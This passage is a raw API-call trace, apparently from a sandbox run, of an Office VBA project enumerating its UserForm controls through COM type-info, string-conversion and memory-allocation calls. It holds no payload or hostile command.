CodePage=0x0, dwFlags=0x0, lpWideCharStr="Label1", cchWideChar=7, lpMultiByteStr=0x2e4150, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label1", lpUsedDefaultChar=0x0) returned 7 [0032.895] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Label1") returned 0x102c8d [0032.895] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b2308) returned 0x0 [0032.896] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e41d0, pDummy=0x500 | out: ppTypeAttr=0x2e41d0, pDummy=0x500) returned 0x0 [0032.896] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.896] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.896] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2080) returned 0x0 [0032.896] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2360) returned 0x0 [0032.896] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.896] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.896] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2800) returned 0x0 [0032.896] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2410) returned 0x0 [0032.896] IUnknown:Release (This=0xb5b2410) returned 0x4 [0032.896] IUnknown:Release (This=0xb5b2308) returned 0x1 [0032.896] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2012, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ZK", cchWideChar=3, lpMultiByteStr=0x2e4150, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZK", lpUsedDefaultChar=0x0) returned 3 [0032.896] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZK") returned 0x106022 [0032.896] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b2308) returned 0x0 [0032.896] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e41d0, pDummy=0x3be | out: ppTypeAttr=0x2e41d0, pDummy=0x3be) returned 0x0 [0032.896] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.896] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.896] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2080) returned 0x0 [0032.896] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2360) returned 0x0 [0032.896] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.896] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.896] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2800) returned 0x0 [0032.896] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2410) returned 0x0 [0032.896] IUnknown:Release (This=0xb5b2410) returned 0x4 [0032.896] IUnknown:Release (This=0xb5b2308) returned 0x1 [0032.897] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2014, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CHAS", cchWideChar=5, lpMultiByteStr=0x2e4150, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHAS", lpUsedDefaultChar=0x0) returned 5 [0032.897] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CHAS") returned 0x10982a [0032.897] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b2308) returned 0x0 [0032.897] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e41d0, pDummy=0x50c | out: ppTypeAttr=0x2e41d0, pDummy=0x50c) returned 0x0 [0032.897] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.897] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.897] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2080) returned 0x0 [0032.897] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2360) returned 0x0 [0032.897] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.897] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.897] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2800) returned 0x0 [0032.897] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2410) returned 0x0 [0032.897] IUnknown:Release (This=0xb5b2410) returned 0x4 [0032.897] IUnknown:Release (This=0xb5b2308) returned 0x1 [0032.897] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2016, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o3", cchWideChar=3, lpMultiByteStr=0x2e4150, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o3", lpUsedDefaultChar=0x0) returned 3 [0032.897] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="o3") returned 0x105e73 [0032.898] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000049, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b2308) returned 0x0 [0032.898] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e41d0, pDummy=0x504 | out: ppTypeAttr=0x2e41d0, pDummy=0x504) returned 0x0 [0032.898] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.898] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.898] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2080) returned 0x0 [0032.898] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2080, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2360) returned 0x0 [0032.898] IUnknown:Release (This=0xb5b2360) returned 0x0 [0032.898] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2308, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.898] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2308, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2800) returned 0x0 [0032.898] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2308, hreftype=0x2800, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2410) returned 0x0 [0032.898] IUnknown:Release (This=0xb5b2410) returned 0x4 [0032.898] IUnknown:Release (This=0xb5b2308) returned 0x1 [0032.898] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2019, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OptionButton2", cchWideChar=14, lpMultiByteStr=0x2e4150, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OptionButton2", lpUsedDefaultChar=0x0) returned 14 [0032.898] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OptionButton2") returned 0x10406c [0032.898] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000025, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b1d88) returned 0x0 [0032.898] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b1d88, ppTypeAttr=0x2e41d0, pDummy=0x532 | out: ppTypeAttr=0x2e41d0, pDummy=0x532) returned 0x0 [0032.898] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b1d88) returned 0x0 [0032.898] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.898] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2400) returned 0x0 [0032.898] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2400, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b1de0) returned 0x0 [0032.898] IUnknown:Release (This=0xb5b1de0) returned 0x0 [0032.898] ITypeInfo:GetImplTypeFlags (in: This=0xb5b1d88, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.898] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b1d88, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2d80) returned 0x0 [0032.898] ITypeInfo:GetRefTypeInfo (in: This=0xb5b1d88, hreftype=0x2d80, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b1ff0) returned 0x0 [0032.898] IUnknown:Release (This=0xb5b1ff0) returned 0x2 [0032.899] IUnknown:Release (This=0xb5b1d88) returned 0x1 [0032.899] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2020, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PropellersHead", cchWideChar=15, lpMultiByteStr=0x2e4150, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PropellersHead", lpUsedDefaultChar=0x0) returned 15 [0032.899] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PropellersHead") returned 0x108b25 [0032.899] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x500003d, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b21a8) returned 0x0 [0032.899] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b21a8, ppTypeAttr=0x2e41d0, pDummy=0x36c | out: ppTypeAttr=0x2e41d0, pDummy=0x36c) returned 0x0 [0032.899] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b21a8) returned 0x0 [0032.899] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.899] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2200) returned 0x0 [0032.899] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2200, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2200) returned 0x0 [0032.899] IUnknown:Release (This=0xb5b2200) returned 0x0 [0032.899] ITypeInfo:GetImplTypeFlags (in: This=0xb5b21a8, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.899] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b21a8, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2a00) returned 0x0 [0032.899] ITypeInfo:GetRefTypeInfo (in: This=0xb5b21a8, hreftype=0x2a00, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b22b0) returned 0x0 [0032.899] IUnknown:Release (This=0xb5b22b0) returned 0x2 [0032.899] IUnknown:Release (This=0xb5b21a8) returned 0x1 [0032.899] ITypeInfo:RemoteGetDocumentation (in: This=0xb5a5078, memid=2022, refPtrFlags=0x2e4298, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0032.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpinButton1", cchWideChar=12, lpMultiByteStr=0x2e4150, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpinButton1", lpUsedDefaultChar=0x0) returned 12 [0032.899] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SpinButton1") returned 0x1038bd [0032.899] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0x5000055, ppTInfo=0x2e4270 | out: ppTInfo=0x2e4270*=0xb5b2468) returned 0x0 [0032.899] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2468, ppTypeAttr=0x2e41d0, pDummy=0x534 | out: ppTypeAttr=0x2e41d0, pDummy=0x534) returned 0x0 [0032.899] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2468) returned 0x0 [0032.899] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2468, index=0x0, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=1) returned 0x0 [0032.899] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2468, index=0x0, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x2700) returned 0x0 [0032.899] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2468, hreftype=0x2700, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b24c0) returned 0x0 [0032.899] IUnknown:Release (This=0xb5b24c0) returned 0x0 [0032.899] ITypeInfo:GetImplTypeFlags (in: This=0xb5b2468, index=0x1, pImplTypeFlags=0x2e41b8 | out: pImplTypeFlags=0x2e41b8*=3) returned 0x0 [0032.899] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5b2468, index=0x1, pRefType=0x2e41c0 | out: pRefType=0x2e41c0*=0x3280) returned 0x0 [0032.899] ITypeInfo:GetRefTypeInfo (in: This=0xb5b2468, hreftype=0x3280, ppTInfo=0x2e41c8 | out: ppTInfo=0x2e41c8*=0xb5b2570) returned 0x0 [0032.900] IUnknown:Release (This=0xb5b2570) returned 0x1 [0032.900] IUnknown:Release (This=0xb5b2468) returned 0x1 [0032.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm", cchWideChar=9, lpMultiByteStr=0x2e4190, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm", lpUsedDefaultChar=0x0) returned 9 [0032.900] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm") returned 0x10044e [0032.900] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.900] IUnknown:AddRef (This=0xb5a50d8) returned 0x3 [0032.900] IMalloc:Alloc (This=0x7fefe015380, cb=0x14) returned 0xb495ad0 [0032.900] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.900] IUnknown:AddRef (This=0xb5a51f8) returned 0x3 [0032.900] IUnknown:AddRef (This=0xb5a50d8) returned 0x3 [0032.901] IMalloc:Alloc (This=0x7fefe015380, cb=0x3a0) returned 0x770da70 [0032.902] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c90 [0032.902] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb495990 [0032.902] strcpy_s (in: _Dst=0x7202d78, _DstSize=0x5, _Src="CHAS" | out: _Dst="CHAS") returned 0x0 [0032.902] IMalloc:Alloc (This=0x7fefe015380, cb=0xa0) returned 0xb4c8780 [0032.903] strcpy_s (in: _Dst=0x7202e00, _DstSize=0xe, _Src="ToggleButton2" | out: _Dst="ToggleButton2") returned 0x0 [0032.903] IMalloc:Alloc (This=0x7fefe015380, cb=0xe0) returned 0xb40faf0 [0032.903] strcpy_s (in: _Dst=0x7202e30, _DstSize=0xe, _Src="OptionButton2" | out: _Dst="OptionButton2") returned 0x0 [0032.903] IMalloc:Alloc (This=0x7fefe015380, cb=0xe0) returned 0xb40fbe0 [0032.903] strcpy_s (in: _Dst=0x7202e48, _DstSize=0x3, _Src="ZK" | out: _Dst="ZK") returned 0x0 [0032.903] IMalloc:Alloc (This=0x7fefe015380, cb=0xa0) returned 0xb4c8150 [0032.903] strcpy_s (in: _Dst=0x7202e70, _DstSize=0xc, _Src="SpinButton1" | out: _Dst="SpinButton1") returned 0x0 [0032.903] IMalloc:Alloc (This=0x7fefe015380, cb=0xc8) returned 0x765d200 [0032.904] strcpy_s (in: _Dst=0x7202e88, _DstSize=0xe, _Src="OptionButton1" | out: _Dst="OptionButton1") returned 0x0 [0032.904] IMalloc:Alloc (This=0x7fefe015380, cb=0xe0) returned 0xb40fcd0 [0032.904] strcpy_s (in: _Dst=0x7202ea0, _DstSize=0x7, _Src="Label1" | out: _Dst="Label1") returned 0x0 [0032.904] IMalloc:Alloc (This=0x7fefe015380, cb=0xa0) returned 0xb4c88e0 [0032.904] strcpy_s (in: _Dst=0x7202ec8, _DstSize=0x9, _Src="UserForm" | out: _Dst="UserForm") returned 0x0 [0032.904] IMalloc:Alloc (This=0x7fefe015380, cb=0x110) returned 0xb553ec0 [0032.904] strcpy_s (in: _Dst=0x7202ef8, _DstSize=0xa, _Src="F3Dynamic" | out: _Dst="F3Dynamic") returned 0x0 [0032.904] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c7720 [0032.905] strcpy_s (in: _Dst=0xb5c77a8, _DstSize=0x5, _Src="Trbd" | out: _Dst="Trbd") returned 0x0 [0032.905] IMalloc:Alloc (This=0x7fefe015380, cb=0xe0) returned 0xb40fdc0 [0032.905] strcpy_s (in: _Dst=0xb5c77b8, _DstSize=0x3, _Src="o3" | out: _Dst="o3") returned 0x0 [0032.905] IMalloc:Alloc (This=0x7fefe015380, cb=0xa0) returned 0xb4c8830 [0032.905] IUnknown:AddRef (This=0xb5a50d8) returned 0x3 [0032.906] IUnknown:AddRef (This=0xb5a5078) returned 0x4 [0032.906] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e48b0 | out: pRefType=0x2e48b0*=0xfffffffe) returned 0x0 [0032.906] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e4988 | out: ppTInfo=0x2e4988*=0xb5a5018) returned 0x0 [0032.906] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75dec30 [0032.906] IUnknown:Release (This=0xb5a5078) returned 0x4 [0032.906] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x49, ppTInfo=0x2e4118 | out: ppTInfo=0x2e4118*=0xb5b2308) returned 0x0 [0032.906] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e42e8 | out: ppvObject=0x2e42e8*=0x0) returned 0x80004002 [0032.906] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e4168, pDummy=0x10 | out: ppTypeAttr=0x2e4168, pDummy=0x10) returned 0x0 [0032.906] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.906] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3e70 | out: ppvObject=0x2e3e70*=0x0) returned 0x80004002 [0032.906] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3e60 | out: ppvObject=0x2e3e60*=0x0) returned 0x80004002 [0032.906] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e3e68 | out: ppvObject=0x2e3e68*=0x0) returned 0x80004002 [0032.906] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e3e98, pDummy=0x10 | out: ppTypeAttr=0x2e3e98, pDummy=0x10) returned 0x0 [0032.906] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0032.906] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0032.906] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4010 | out: ppvObject=0x2e4010*=0x0) returned 0x80004002 [0032.906] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4008 | out: ppvObject=0x2e4008*=0x0) returned 0x80004002 [0032.906] IUnknown:Release (This=0xb5b2308) returned 0x2 [0032.906] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0032.906] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0032.906] IUnknown:QueryInterface (in: This=0xb5a5018, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4950 | out: ppvObject=0x2e4950*=0x0) returned 0x80004002 [0032.906] IUnknown:QueryInterface (in: This=0xb5a5018, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4920 | out: ppvObject=0x2e4920*=0x0) returned 0x80004002 [0032.907] IUnknown:QueryInterface (in: This=0xb5a5018, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4910 | out: ppvObject=0x2e4910*=0x0) returned 0x80004002 [0032.907] IUnknown:QueryInterface (in: This=0xb5a5018, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4918 | out: ppvObject=0x2e4918*=0x0) returned 0x80004002 [0032.907] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4948, pDummy=0x10 | out: ppTypeAttr=0x2e4948, pDummy=0x10) returned 0x0 [0032.907] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0032.907] IUnknown:AddRef (This=0xb5a5018) returned 0x7 [0032.907] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4d88, pDummy=0x0 | out: ppTypeAttr=0x2e4d88, pDummy=0x0) returned 0x0 [0032.907] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0032.907] IUnknown:Release (This=0xb5a5018) returned 0x6 [0032.907] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0032.907] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4320, pDummy=0x0 | out: ppTypeAttr=0x2e4320, pDummy=0x0) returned 0x0 [0032.907] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0032.907] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x75ddd30 [0032.907] IUnknown:Release (This=0xb5b2308) returned 0x2 [0032.907] IUnknown:QueryInterface (in: This=0xb5b23b8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4950 | out: ppvObject=0x2e4950*=0x0) returned 0x80004002 [0032.907] IUnknown:QueryInterface (in: This=0xb5b23b8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4920 | out: ppvObject=0x2e4920*=0x0) returned 0x80004002 [0032.907] IUnknown:QueryInterface (in: This=0xb5b23b8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4910 | out: ppvObject=0x2e4910*=0x0) returned 0x80004002 [0032.907] IUnknown:QueryInterface (in: This=0xb5b23b8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4918 | out: ppvObject=0x2e4918*=0x0) returned 0x80004002 [0032.907] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e4948, pDummy=0x10 | out: ppTypeAttr=0x2e4948, pDummy=0x10) returned 0x0 [0032.907] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0032.907] IUnknown:AddRef (This=0xb5b23b8) returned 0x4 [0032.908] IUnknown:AddRef (This=0xb5b23b8) returned 0x4 [0032.908] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e4d88, pDummy=0x9e40eb6 | out: 